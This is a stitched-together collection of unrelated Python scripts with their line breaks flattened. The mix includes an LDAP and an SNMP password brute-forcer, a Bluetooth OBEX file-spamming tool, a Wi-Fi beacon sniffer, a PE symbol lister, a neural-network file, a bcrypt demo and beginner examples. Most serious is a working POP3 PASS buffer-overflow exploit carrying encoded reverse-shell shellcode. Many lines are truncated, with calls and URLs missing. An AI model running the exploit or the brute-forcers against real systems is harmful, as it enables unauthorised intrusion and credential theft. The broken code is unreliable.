#coding=utf-8 import time import threading from printers import printPink,printGreen from multiprocessing.dummy import Pool import ldap class ldap_burp(object): def __init__(self,c): self.config=c self.lock=threading.Lock() self.result=[] self.lines=self.config.file2list("conf/ldapd.conf") def ldap_connect(self,ip,username,password,port): creak=0 try: ldappath='ldap://'+ip+':'+port+'/' l = ldap.initialize(ldappath) re=l.simple_bind(username,password) if re==1: creak=1 except Exception,e: if e[0]['desc']=="Can't contact LDAP server": creak=2 pass return creak def ldap_creak(self,ip,port): try: for data in self.lines: username=data.split(':')[0] password=data.split(':')[1] flag=self.ldap_connect(ip,username,password,port) if flag==2: self.lock.acquire() printGreen("%s ldap at %s can't connect\r\n" %(ip,port)) self.lock.release() break if flag==1: self.lock.acquire() printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) self.lock.release() break else: self.lock.acquire() print "%s ldap service 's %s:%s login fail " %(ip,username,password) self.lock.release() except Exception,e: pass def run(self,ipdict,pinglist,threads,file): if len(ipdict['ldap']): printPink("crack ldap now...") print "[*] start ldap %s" % time.ctime() starttime=time.time() pool=Pool(threads) for ip in ipdict['ldap']: pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1])) pool.close() pool.join() print "[*] stop ldap serice %s" % time.ctime() print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime) for i in xrange(len(self.result)): self.config.write_file(contents=self.result[i],file=file) if __name__ == '__main__': import sys sys.path.append("../") from comm.config import * c=config() ipdict={'ldap': ['']} pinglist=[''] test=ldap_burp(c),pinglist,50,file="../result/test")
#!/usr/bin/python3 # # A script that enumerates Imports and Exports of PE files and prints them according to search criterias. # # Let's the user find imported/exported symbols matching criterias such as: # - symbol being import or export # - symbol matching name # - symbol NOT matching name # - module matching name # - module NOT matching name # # Mariusz Banach / mgeeky, '21 # <mb [at]> # import os import re import sys import glob import json import time import signal import pprint import pefile import tabulate import platform import textwrap import argparse import tempfile import subprocess import multiprocessing from datetime import datetime from itertools import product from multiprocessing import Pool, Queue, Process, freeze_support, Manager, Lock DEFAULT_COLUMN_SORTED = 'filename' headers = [ 'filename', 'symbol type', 'module', 'symbol', 'file size', 'path', ] symbol_idx = headers.index('symbol') class Logger: colors_map = { 'red': 31, 'green': 32, 'yellow': 33, 'blue': 34, 'magenta': 35, 'cyan': 36, 'white': 37, 'grey': 38, } colors_dict = { 'error': colors_map['red'], 'trace': colors_map['magenta'], 'info ': colors_map['green'], 'debug': colors_map['grey'], 'other': colors_map['grey'], } @staticmethod def with_color(c, s): return "\x1b[%dm%s\x1b[0m" % (c, s) @staticmethod def end_color(s): return "%s\x1b[0m" % (s) @staticmethod def colored(args, txt, col): if not args.color: return txt return Logger.with_color(Logger.colors_map[col], txt) def out(x): sys.stderr.write(x + '\n') def verbose(args, x): if args.verbose: sys.stderr.write('[verbose] ' + x + '\n') def collectImports(args, mod): imports = [] if not hasattr(mod, 'DIRECTORY_ENTRY_IMPORT') or not mod.DIRECTORY_ENTRY_IMPORT: return imports try: for entry in mod.DIRECTORY_ENTRY_IMPORT: module = entry.dll.decode('utf-8').lower() for func in entry.imports: if not continue func = imports.append(('import', module, func)) except Exception as e: verbose(args, f'Exception occured while collecting PE imports: {e}') return imports def collectExports(args, filename, mod): exports = [] if not hasattr(mod, 'DIRECTORY_ENTRY_EXPORT') or not mod.DIRECTORY_ENTRY_EXPORT: return exports try: for entry in mod.DIRECTORY_ENTRY_EXPORT.symbols: if not continue func = exports.append(('export', os.path.basename(filename), func)) except Exception as e: verbose(args, f'Exception occured while collecting PE exports: {e}') return exports def verifyCriterias(args, regexes, infos, uniqueSymbols): if args.unique and infos['symbol'] in uniqueSymbols: verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it is not unique in our results.') return False if args.imports and infos['symbol type'] != 'import': verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it was not an import.') return False if args.exports and infos['symbol type'] != 'export': verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} because it was not an export.') return False regexesVerified = sum([len(v) for k, v in regexes.items()]) regexes_name = len(regexes['name']) regexes_not_name = len(regexes['not-name']) regexes_module = len(regexes['module']) regexes_not_module = len(regexes['not-module']) for name, rex in regexes['not-name']: match =['symbol']) if match: matched = infos['symbol'] = infos['symbol'].replace(matched, Logger.colored(args, matched, 'red')) verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} as it DID satisfy not-name ({name}) regex.') return False if regexes_not_module+regexes_module+regexes_name == 0: verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criterias.') return True for name, rex in regexes['not-module']: match =['module']) if match: matched = infos['module'] = infos['module'].replace(matched, Logger.colored(args, matched, 'red')) verbose(args, f'(-) Skipping symbol\'s module {infos["module"]}.{infos["symbol"]} as it DID satisfy not-module ({name}) regex.') return False if regexes_module+regexes_name == 0: verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criterias.') return True satisifed = False carryOn = False if len(regexes['module']) > 0: for name, rex in regexes['module']: match =['module']) if match: matched = infos['module'] = infos['module'].replace(matched, Logger.colored(args, matched, 'green')) verbose(args, f'(+) Symbol\'s module {infos["module"]}.{infos["symbol"]} satisfied module ({name}) regex.') carryOn = True break else: carryOn = True if regexes_name == 0: verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criterias.') return True if carryOn: for name, rex in regexes['name']: match =['symbol']) if match: matched = infos['symbol'] = infos['symbol'].replace(matched, Logger.colored(args, matched, 'green')) verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied name ({name}) regex.') satisifed = True break if regexesVerified == 0 or satisifed: verbose(args, f'(+) Symbol {infos["module"]}.{infos["symbol"]} satisfied all criterias.') return True else: verbose(args, f'(-) Skipping symbol {infos["module"]}.{infos["symbol"]} as it DID NOT satisfy all criterias.') return False def processFileWorker(arguments): out = None try: (args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed) = arguments out = processFile(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed) except (KeyboardInterrupt, SystemExit) as e: out(e) return out def processFile(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed): verbose(args, 'Processing file: ' + path) mod = None try: mod = pefile.PE(path, fast_load = True) mod.parse_data_directories() except: mod.close() return imports = collectImports(args, mod) exports = collectExports(args, os.path.basename(path), mod) symbols = imports + exports mod.close() once = False for (symbolType, symbolModule, symbolName) in symbols: infos = { 'path' : path, 'filename' : os.path.basename(path), 'file size' : os.path.getsize(path), 'symbol type' : symbolType, 'symbol' : symbolName, 'module' : symbolModule, } if not once: assert len(infos.keys()) == len(headers), "headers and infos.keys() mismatch" assert list(infos.keys()).sort() == list(headers).sort(), "headers and infos.keys() mismatch while sorted" once = True if args.format == 'text': appendRow = verifyCriterias(args, regexes, infos, uniqueSymbols) if args.color: if infos['symbol type'] == 'import': infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'cyan') else: infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'yellow') if appendRow: row = [] MaxWidth = 40 for h in headers: obj = None if type(infos[h]) == set or type(infos[h]) == list or type(infos[h]) == tuple: obj = ', '.join(infos[h]) else: obj = infos[h] if type(obj) == str and len(obj) > MaxWidth: if h == 'path': obj = '\n'.join(textwrap.wrap(obj, width = 2 * MaxWidth)) else: obj = '\n'.join(textwrap.wrap(obj, width = MaxWidth)) row.append(obj) results.append(row) uniqueSymbols.append(symbolName) #verbose(args, 'Processed results:\n' + pprint.pformat(infos)) else: verbose(args, f'Symbol {symbolModule}.{symbolName} did not met filter criterias.') elif args.format == 'json': appendRow = verifyCriterias(args, regexes, infos, uniqueSymbols) if args.color: if infos['symbol type'] == 'import': infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'cyan') else: infos['symbol type'] = Logger.colored(args, infos['symbol type'], 'yellow') if appendRow: results.append(infos) uniqueSymbols.append(symbolName) #verbose(args, 'Processed results:\n' + pprint.pformat(infos)) else: verbose(args, f'Symbol {symbolModule}.{symbolName} did not met filter criterias.') filesProcessed.value += 1 symbolsProcessed.value += len(symbols) def trap_handler(signum, frame): out('[-] CTRL-C pressed. Wait a minute until all processes wrap up or manually terminate python\'s child processes tree.') def init_worker(): signal.signal(signal.SIGINT, trap_handler) def processDir(args, regexes, path, results, uniqueSymbols, filesProcessed, symbolsProcessed): filePaths = [] out('[.] Building list of files to process...') for file in glob.glob(os.path.join(path, '**'), recursive=args.recurse): try: if len(args.extension) > 0: skip = True for ext in args.extension: if file.lower().endswith(f'.{ext}'): skip = False break if skip: verbose(args, f'[-] Skipping file as it not matched extension ({ext}): {file}') continue if os.path.isfile(file): looks_like_pe = False with open(file, 'rb') as f: mz = if len(mz) == 2: looks_like_pe = (mz[0] == ord('M') and mz[1] == ord('Z')) or (mz[1] == ord('M') and mz[0] == ord('Z')) if looks_like_pe: filePaths.append(file) except Exception as e: verbose(args, f'[-] Could not open file: ({file}). Exception: {e}') continue cpu_count = multiprocessing.cpu_count() pool = Pool(cpu_count, initializer=init_worker) try: arguments = [[args, regexes, _path, results, uniqueSymbols, filesProcessed, symbolsProcessed] for _path in filePaths] out(f'[.] Scanning {Logger.colored(args, len(filePaths), "yellow")} files...') if len(filePaths) > 5000: out(f'[.] Be patient that\'s gonna take a long while...') res =, arguments) except KeyboardInterrupt: out(f'[-] User interrupted the scan after {Logger.colored(args, filesProcessed.value, "red")} files.') pool.terminate() pool.join() def opts(argv): params = argparse.ArgumentParser( prog = argv[0], usage='%(prog)s [options] <path>' ) params.add_argument('path', help = 'Path to a PE file or directory.') params.add_argument('-r', '--recurse', action='store_true', help='If <path> is a directory, perform recursive scan.') params.add_argument('-v', '--verbose', action='store_true', help='Verbose mode.') params.add_argument('-f', '--format', choices=['text', 'json'], default='text', help='Output format. Text or JSON.') params.add_argument('-E', '--extension', default=[], action='append', help='Extensions of files to scan. By default will scan all files. Can be repeated: -E exe -E dll') params.add_argument('-o', '--output', metavar='PATH', help='Write output to file.') params.add_argument('-C', '--color', default=False, action='store_true', help='Add colors to text output. May uglify table text output') sorting = params.add_argument_group('Output sorting') sorting.add_argument('-u', '--unique', action='store_true', help = 'Return unique symbols only. The first symbol with a name that occurs in results, will be returned.') sorting.add_argument('-d', '--descending', action='store_true', help = 'Sort in descending order instead of default of descending.') sorting.add_argument('-c', '--column', default=DEFAULT_COLUMN_SORTED, choices=headers, metavar='COLUMN', help = 'Sort by this column name. Default: filename. Available columns: "' + '", "'.join(headers) + '"') sorting.add_argument('-n', '--first', type=int, default=0, metavar='NUM', help='Show only first N results, as specified in this paremeter. By default will show all candidates.') filters = params.add_argument_group('Output filtering') filters.add_argument('-i', '--imports', action='store_true', help = 'Filter only Imports.') filters.add_argument('-e', '--exports', action='store_true', help = 'Filter only Exports.') filters.add_argument('-s', '--name', action='append', default=[], help = 'Search for symbols with name matching this regular expression. Can be repeated, case insensitive') filters.add_argument('-S', '--not-name', action='append', default=[], help = 'Search for symbols with name NOT matching this regular expression.') filters.add_argument('-m', '--module', action='append', default=[], help = 'Search for symbols exported in/imported from this module matching regular expression.') filters.add_argument('-M', '--not-module', action='append', default=[], help = 'Search for symbols NOT exported in/NOT imported from this module matching regular expression.') args = params.parse_args() if args.imports and args.exports: out('[!] --imports and --exports are mutually exclusive. Pick only one of them!') sys.exit(1) accomodate_rex = lambda x: f'({x})' regexes = { 'name': [], 'not-name': [], 'module': [], 'not-module': [] } for name in regexes['name'].append((name, re.compile(accomodate_rex(name), re.I))) for not_name in args.not_name: regexes['not-name'].append((not_name, re.compile(accomodate_rex(not_name), re.I))) for module in args.module: regexes['module'].append((module, re.compile(accomodate_rex(module), re.I))) for not_module in args.not_module: regexes['not-module'].append((not_module, re.compile(accomodate_rex(not_module), re.I))) for i in range(len(args.extension)): args.extension[i] = args.extension[i].lower() if args.extension[i].startswith('.'): args.extension[i] = args.extension[i][1:] return args, regexes def main(): results = Manager().list() uniqueSymbols = Manager().list() filesProcessed = Manager().Value('i', 0) symbolsProcessed = Manager().Value('i', 0) out(''' :: - Finds PE Import/Exports based on supplied filters. Mariusz Banach / mgeeky, '21 <mb [at]> ''') args, regexes = opts(sys.argv) is_wow64 = (platform.architecture()[0] == '32bit' and 'ProgramFiles(x86)' in os.environ) start_time = try: if '\\system32\\' in args.path.lower() and is_wow64: verbose(args, 'Redirecting input path from System32 to SysNative as we run from 32bit Python.') args.path = args.path.lower().replace('\\system32\\', '\\SysNative\\') if os.path.isdir(args.path): processDir(args, regexes, args.path, results, uniqueSymbols, filesProcessed, symbolsProcessed) else: if not os.path.isfile(args.path): out(f'[!] Input file does not exist! Path: {args.path}') sys.exit(1) processFile(args, regexes, args.path, results, uniqueSymbols, filesProcessed, symbolsProcessed) except KeyboardInterrupt: out(f'[-] User interrupted the scan.') time_elapsed = - start_time if args.format == 'json': resultsList = list(results) dumped = str(json.dumps(resultsList, indent=4)) if args.output: with open(args.output, 'w') as f: f.write(dumped) else: print('\n' + dumped) else: resultsList = list(results) if len(resultsList) > 0: idx = headers.index(args.column) resultsList.sort(key = lambda x: x[idx], reverse = args.descending) headers[idx] = '▼ ' + headers[idx] if args.descending else '▲ ' + headers[idx] if args.first > 0: for i in range(len(resultsList) - args.first): resultsList.pop() table = tabulate.tabulate(resultsList, headers=['#',] + headers, showindex='always', tablefmt='pretty') if args.output: with open(args.output, 'w', encoding='utf-8') as f: f.write(str(table)) else: print('\n' + table) if args.first > 0: out(f'\n[+] Found {Logger.colored(args, len(resultsList), "green")} symbols meeting all the criterias (but shown only first {Logger.colored(args, args.first, "magenta")} ones).\n') else: out(f'\n[+] Found {Logger.colored(args, len(resultsList), "green")} symbols meeting all the criterias.\n') else: out(f'[-] Did not find symbols meeting specified criterias.') out(f'[.] Processed {Logger.colored(args, filesProcessed.value, "green")} files and {Logger.colored(args, symbolsProcessed.value, "green")} symbols.') out('[.] Time elapsed: {}'.format(Logger.colored(args, time_elapsed, "magenta"))) if __name__ == '__main__': freeze_support() main()
#coding=utf-8 import time import threading from printers import printPink,printGreen from multiprocessing.dummy import Pool from pysnmp.entity.rfc3413.oneliner import cmdgen class snmp_burp(object): def __init__(self,c): self.config=c self.lock=threading.Lock() self.result=[] self.lines=self.config.file2list("conf/snmp.conf") def snmp_connect(self,ip,key): crack =0 try: errorIndication, errorStatus, errorIndex, varBinds =\ cmdgen.CommandGenerator().getCmd( cmdgen.CommunityData('my-agent',key, 0), cmdgen.UdpTransportTarget((ip, 161)), (1,3,6,1,2,1,1,1,0) ) if varBinds: crack=1 except: pass return crack def snmp_l(self,ip,port): try: for data in self.lines: flag=self.snmp_connect(ip,key=data) if flag==1: self.lock.acquire() printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) self.lock.release() break else: self.lock.acquire() print "test %s snmp's scan fail" %(ip) self.lock.release() except Exception,e: pass def run(self,ipdict,pinglist,threads,file): printPink("crack snmp now...") print "[*] start crack snmp %s" % time.ctime() starttime=time.time() pool=Pool(threads) for ip in pinglist: pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],"")) pool.close() pool.join() print "[*] stop crack snmp %s" % time.ctime() print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime) for i in xrange(len(self.result)): self.config.write_file(contents=self.result[i],file=file)
# # Bluetooth scanner with ability to spam devices # with incoming OBEX Object Push requests containing # specified file. # # Mariusz Banach / MGeeky, 16' # # Partially based on `Violent Python` snippets. # Modules required: # python-bluez # python-obexftp # import bluetooth import scapy import obexftp import sys import optparse import threading import time import os foundDevs = [] def printDev(name, dev, txt='Bluetooth device'): print '[+] %s: "%s" (MAC: %s)' % (txt, name, dev) def retBtAddr(addr): btAddr = str(hex(int(addr.replace(':', ''), 16) + 1))[2:] btAddr = btAddr[0:2] + ':' + btAddr[2:4] + ':' + btAddr[4:6] + \ ':' + btAddr[6:8] + ':' + btAddr[8:10] + ':' + btAddr[10:12] return btAddr def checkBluetooth(btAddr): btName = bluetooth.lookup_name(btAddr) if btName: printDev('Hidden Bluetooth device detected', btName, btAddr) return True return False def sendFile(dev, filename): if os.path.exists(filename): client = obexftp.client(obexftp.BLUETOOTH) channel = obexftp.browsebt(dev, obexftp.PUSH) print '[>] Sending file to %s@%s' % (dev, str(channel)) client.connect(dev, channel) ret = client.put_file(filename) if int(ret) >= 1: print '[>] File has been sent.' else: print '[!] File has not been accepted.' client.disconnect() else: print '[!] Specified file: "%s" does not exists.' def findDevs(opts): global foundDevs devList = bluetooth.discover_devices(lookup_names=True) repeat = range(0, int(opts.repeat)) for (dev, name) in devList: if dev not in foundDevs: name = str(bluetooth.lookup_name(dev)) printDev(name, dev) foundDevs.append(dev) for i in repeat: sendFile(dev, opts.file) continue if opts.spam: for i in repeat: sendFile(dev, opts.file) def main(): parser = optparse.OptionParser(usage='Usage: %prog [options]') parser.add_option('-f', '--file', dest='file', metavar='FILE', help='Specifies file to be sent to discovered devices.') parser.add_option('-t', '--time', dest='time', metavar='TIMEOUT', help='Specifies scanning timeout (default - 0 secs).', default='0') parser.add_option('-r', '--repeat', dest='repeat', metavar='REPEAT', help='Number of times to repeat file sending after finding a device (default - 1)', default='1') parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly') print '\nBluetooth file carpet bombing via OBEX Object Push' print 'Mariusz Banach / MGeeky 16\n' (opts, args) = parser.parse_args() if opts.file != '': if not os.path.exists(opts.file): print '[!] Specified file: "%s" does not exists.' sys.exit(0) print '[+] Started Bluetooth scanning. Ctr-C to stop...' timeout = float(opts.time) try: while True: findDevs(opts) time.sleep(timeout) except KeyboardInterrupt, e: print '\n[?] User interruption.' if __name__ == '__main__': main()
import urllib2 import sys __author__ = 'Preston Miller and Chapin Bryce' __date__ = '20160401' __version__ = 0.02 __description__ = """Reads's USB.ids file and parses into usable data for parsing VID/PIDs""" def main(): ids = get_ids() usb_file = get_usb_file() usbs = parse_file(usb_file) search_key(usbs, ids) def get_ids(): if len(sys.argv) >= 3: return sys.argv[1], sys.argv[2] else: print 'Please provide the vendor Id and product Id separated by spaces. on the command line' sys.exit(1) def get_usb_file(): url = '' return urllib2.urlopen(url) def parse_file(usb_file): usbs = {} curr_id = '' for line in usb_file: if line.startswith('#') or line == '\n': pass else: if not(line.startswith('\t')) and (line[0].isdigit() or line[0].islower()): usb_id, name = getRecord(line.strip()) curr_id = usb_id usbs[usb_id] = [name, {}] elif line.startswith('\t') and line.count('\t') == 1: usb_id, name = getRecord(line.strip()) usbs[curr_id][1][usb_id] = name return usbs def getRecord(record_line): split = record_line.find(' ') record_id = record_line[:split] record_name = record_line[split + 1:] return record_id, record_name def search_key(usb_dict, ids): vendor_key = ids[0] product_key = ids[1] try: vendor = usb_dict[vendor_key][0] except KeyError: vendor = 'Unknown' try: product = usb_dict[vendor_key][1][product_key] except KeyError: product = 'Unknown' return vendor, product
""" ~~~~~~~~~~ A module to implement the stochastic gradient descent learning algorithm for a feedforward neural network. Gradients are calculated using backpropagation. Note that I have focused on making the code simple, easily readable, and easily modifiable. It is not optimized, and omits many desirable features. """ #### Libraries # Standard library import random # Third-party libraries import numpy as np class Network(object): def __init__(self, sizes): """The list ``sizes`` contains the number of neurons in the respective layers of the network. For example, if the list was [2, 3, 1] then it would be a three-layer network, with the first layer containing 2 neurons, the second layer 3 neurons, and the third layer 1 neuron. The biases and weights for the network are initialized randomly, using a Gaussian distribution with mean 0, and variance 1. Note that the first layer is assumed to be an input layer, and by convention we won't set any biases for those neurons, since biases are only ever used in computing the outputs from later layers.""" self.num_layers = len(sizes) self.sizes = sizes self.biases = [np.random.randn(y, 1) for y in sizes[1:]] self.weights = [np.random.randn(y, x) for x, y in zip(sizes[:-1], sizes[1:])] def adversarial(self, n): goal = np.zeros((10, 1)) goal[n] = 1 x = np.random.normal(.5, .3, (784, 1)) orig = np.copy(x) for i in range(10000): d = self.input_derivative(x,goal) x -= .01 * d return x def feedforward(self, a): """Return the output of the network if ``a`` is input.""" for b, w in zip(self.biases, self.weights): a = sigmoid(, a)+b) return a def SGD(self, training_data, epochs, mini_batch_size, eta, test_data=None): """Train the neural network using mini-batch stochastic gradient descent. The ``training_data`` is a list of tuples ``(x, y)`` representing the training inputs and the desired outputs. The other non-optional parameters are self-explanatory. If ``test_data`` is provided then the network will be evaluated against the test data after each epoch, and partial progress printed out. This is useful for tracking progress, but slows things down substantially.""" if test_data: n_test = len(test_data) n = len(training_data) for j in xrange(epochs): random.shuffle(training_data) mini_batches = [ training_data[k:k+mini_batch_size] for k in xrange(0, n, mini_batch_size)] for mini_batch in mini_batches: self.update_mini_batch(mini_batch, eta) if test_data: print("Epoch {0}: {1} / {2}".format( j, self.evaluate(test_data), n_test)) else: print("Epoch {0} complete".format(j)) def update_mini_batch(self, mini_batch, eta): """Update the network's weights and biases by applying gradient descent using backpropagation to a single mini batch. The ``mini_batch`` is a list of tuples ``(x, y)``, and ``eta`` is the learning rate.""" nabla_b = [np.zeros(b.shape) for b in self.biases] nabla_w = [np.zeros(w.shape) for w in self.weights] for x, y in mini_batch: delta_nabla_b, delta_nabla_w = self.backprop(x, y) nabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)] nabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)] self.weights = [w-(eta/len(mini_batch))*nw for w, nw in zip(self.weights, nabla_w)] self.biases = [b-(eta/len(mini_batch))*nb for b, nb in zip(self.biases, nabla_b)] def backprop(self, x, y): """Return a tuple ``(nabla_b, nabla_w)`` representing the gradient for the cost function C_x. ``nabla_b`` and ``nabla_w`` are layer-by-layer lists of numpy arrays, similar to ``self.biases`` and ``self.weights``.""" nabla_b = [np.zeros(b.shape) for b in self.biases] nabla_w = [np.zeros(w.shape) for w in self.weights] # feedforward activation = x activations = [x] # list to store all the activations, layer by layer zs = [] # list to store all the z vectors, layer by layer for b, w in zip(self.biases, self.weights): z =, activation)+b zs.append(z) activation = sigmoid(z) activations.append(activation) # backward pass delta = self.cost_derivative(activations[-1], y) * \ sigmoid_prime(zs[-1]) nabla_b[-1] = delta nabla_w[-1] =, activations[-2].transpose()) # Note that the variable l in the loop below is used a little # differently to the notation in Chapter 2 of the book. Here, # l = 1 means the last layer of neurons, l = 2 is the # second-last layer, and so on. It's a renumbering of the # scheme in the book, used here to take advantage of the fact # that Python can use negative indices in lists. for l in xrange(2, self.num_layers): z = zs[-l] sp = sigmoid_prime(z) delta =[-l+1].transpose(), delta) * sp nabla_b[-l] = delta nabla_w[-l] =, activations[-l-1].transpose()) return (nabla_b, nabla_w) def input_derivative(self, x, y): """ Calculate derivatives wrt the inputs""" nabla_b = [np.zeros(b.shape) for b in self.biases] nabla_w = [np.zeros(w.shape) for w in self.weights] # feedforward activation = x activations = [x] # list to store all the activations, layer by layer zs = [] # list to store all the z vectors, layer by layer for b, w in zip(self.biases, self.weights): z =, activation)+b zs.append(z) activation = sigmoid(z) activations.append(activation) # backward pass delta = self.cost_derivative(activations[-1], y) * \ sigmoid_prime(zs[-1]) nabla_b[-1] = delta nabla_w[-1] =, activations[-2].transpose()) # Note that the variable l in the loop below is used a little # differently to the notation in Chapter 2 of the book. Here, # l = 1 means the last layer of neurons, l = 2 is the # second-last layer, and so on. It's a renumbering of the # scheme in the book, used here to take advantage of the fact # that Python can use negative indices in lists. for l in xrange(2, self.num_layers): z = zs[-l] sp = sigmoid_prime(z) delta =[-l+1].transpose(), delta) * sp nabla_b[-l] = delta nabla_w[-l] =, activations[-l-1].transpose()) return self.weights[0] def evaluate(self, test_data): """Return the number of test inputs for which the neural network outputs the correct result. Note that the neural network's output is assumed to be the index of whichever neuron in the final layer has the highest activation.""" test_results = [(np.argmax(self.feedforward(x)), y) for (x, y) in test_data] return sum(int(x == y) for (x, y) in test_results) def cost_derivative(self, output_activations, y): """Return the vector of partial derivatives \partial C_x / \partial a for the output activations.""" return (output_activations-y) #### Miscellaneous functions def sigmoid(z): """The sigmoid function.""" return 1.0/(1.0+np.exp(-z)) def sigmoid_prime(z): """Derivative of the sigmoid function.""" return sigmoid(z)*(1-sigmoid(z))
#!/usr/bin/python import socket buffer=["A"] counter=100 LPORT1433 = "" LPORT1433 += "\x9b\x98\x40\x48\x4b\x98\xd6\x41\x41\x42\xda\xd8" LPORT1433 += "\xd9\x74\x24\xf4\xbd\x24\x8b\x25\x21\x58\x29\xc9" LPORT1433 += "\xb1\x52\x83\xe8\xfc\x31\x68\x13\x03\x4c\x98\xc7" LPORT1433 += "\xd4\x70\x76\x85\x17\x88\x87\xea\x9e\x6d\xb6\x2a" LPORT1433 += "\xc4\xe6\xe9\x9a\x8e\xaa\x05\x50\xc2\x5e\x9d\x14" LPORT1433 += "\xcb\x51\x16\x92\x2d\x5c\xa7\x8f\x0e\xff\x2b\xd2" LPORT1433 += "\x42\xdf\x12\x1d\x97\x1e\x52\x40\x5a\x72\x0b\x0e" LPORT1433 += "\xc9\x62\x38\x5a\xd2\x09\x72\x4a\x52\xee\xc3\x6d" LPORT1433 += "\x73\xa1\x58\x34\x53\x40\x8c\x4c\xda\x5a\xd1\x69" LPORT1433 += "\x94\xd1\x21\x05\x27\x33\x78\xe6\x84\x7a\xb4\x15" LPORT1433 += "\xd4\xbb\x73\xc6\xa3\xb5\x87\x7b\xb4\x02\xf5\xa7" LPORT1433 += "\x31\x90\x5d\x23\xe1\x7c\x5f\xe0\x74\xf7\x53\x4d" LPORT1433 += "\xf2\x5f\x70\x50\xd7\xd4\x8c\xd9\xd6\x3a\x05\x99" LPORT1433 += "\xfc\x9e\x4d\x79\x9c\x87\x2b\x2c\xa1\xd7\x93\x91" LPORT1433 += "\x07\x9c\x3e\xc5\x35\xff\x56\x2a\x74\xff\xa6\x24" LPORT1433 += "\x0f\x8c\x94\xeb\xbb\x1a\x95\x64\x62\xdd\xda\x5e" LPORT1433 += "\xd2\x71\x25\x61\x23\x58\xe2\x35\x73\xf2\xc3\x35" LPORT1433 += "\x18\x02\xeb\xe3\x8f\x52\x43\x5c\x70\x02\x23\x0c" LPORT1433 += "\x18\x48\xac\x73\x38\x73\x66\x1c\xd3\x8e\xe1\xe3" LPORT1433 += "\x8c\x6a\x63\x8b\xce\x8a\x81\xd5\x46\x6c\xe3\xf5" LPORT1433 += "\x0e\x27\x9c\x6c\x0b\xb3\x3d\x70\x81\xbe\x7e\xfa" LPORT1433 += "\x26\x3f\x30\x0b\x42\x53\xa5\xfb\x19\x09\x60\x03" LPORT1433 += "\xb4\x25\xee\x96\x53\xb5\x79\x8b\xcb\xe2\x2e\x7d" LPORT1433 += "\x02\x66\xc3\x24\xbc\x94\x1e\xb0\x87\x1c\xc5\x01" LPORT1433 += "\x09\x9d\x88\x3e\x2d\x8d\x54\xbe\x69\xf9\x08\xe9" LPORT1433 += "\x27\x57\xef\x43\x86\x01\xb9\x38\x40\xc5\x3c\x73" LPORT1433 += "\x53\x93\x40\x5e\x25\x7b\xf0\x37\x70\x84\x3d\xd0" LPORT1433 += "\x74\xfd\x23\x40\x7a\xd4\xe7\x70\x31\x74\x41\x19" LPORT1433 += "\x9c\xed\xd3\x44\x1f\xd8\x10\x71\x9c\xe8\xe8\x86" LPORT1433 += "\xbc\x99\xed\xc3\x7a\x72\x9c\x5c\xef\x74\x33\x5c" LPORT1433 += "\x3a" #Bingo this works--Had an issue with bad chars.Rev shell also works like charm buffer = '\x41' * 2606 if 1: print"Fuzzing PASS with %s bytes" % len(buffer) #print str(string) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('',110)) data=s.recv(1024) #print str(data) s.send('USER username \r\n') data=s.recv(1024) print str(data) s.send('PASS ' + buffer + '\x8f\x35\x4a\x5f'+ LPORT1433 + '\r\n') #data=s.recv(1024) #print str(data) print "done" #s.send('QUIT\r\n') s.close()
#! /usr/bin/python3.5 i=0 print("------ While Basics ------") while i < 5: print("Without Braces : Statement %s "%i) i=i+1 i=0 while (i < 5): print("With Braces : Statement %s "%i) i=i+1 print("------- While with Lists ------") my_list=[1,2,"a","b",33.33,"c",4,5,['item 1','item 2']] i=0 while(i < len(my_list)): if (type(my_list[i]) == type(1)): print ("Found Integer : %s "%my_list[i]) elif (type(my_list[i]) == type("a")): print ("Found String : %s "%my_list[i]) elif (type(my_list[i]) == type([])): print("------Found Inner list -Now lets iterate:---------") j=0 while(j< len(my_list[i])): print("Inner Item : %s "%my_list[i][j]) j =j +1 else: print("Neither integer nor string : %s and Type is : %s "%(my_list[i],type(my_list[i]))) i=i+1
from scapy.all import * import struct interface = 'mon0' ap_list = [] def info(fm): if fm.haslayer(Dot11): if ((fm.type == 0) & (fm.subtype==8)): if fm.addr2 not in ap_list: ap_list.append(fm.addr2) print "SSID--> ",,"-- BSSID --> ",fm.addr2, \ "-- Channel--> ", ord(fm[Dot11Elt:3].info) sniff(iface=interface,prn=info)
#!/usr/bin/python # -*- coding: utf-8 -*- import bcrypt # Let's first enter a password new = raw_input('Please enter a password: ') # We'll encrypt the password with bcrypt with the default salt value of 12 hashed = bcrypt.hashpw(new, bcrypt.gensalt()) # We'll print the hash we just generated print('The string about to be stored is: ' + hashed) # Confirm we entered the correct password plaintext = raw_input('Please re-enter the password to check: ') # Check if both passwords match if bcrypt.hashpw(plaintext, hashed) == hashed: print 'It\'s a match!' else: print 'Please try again.'
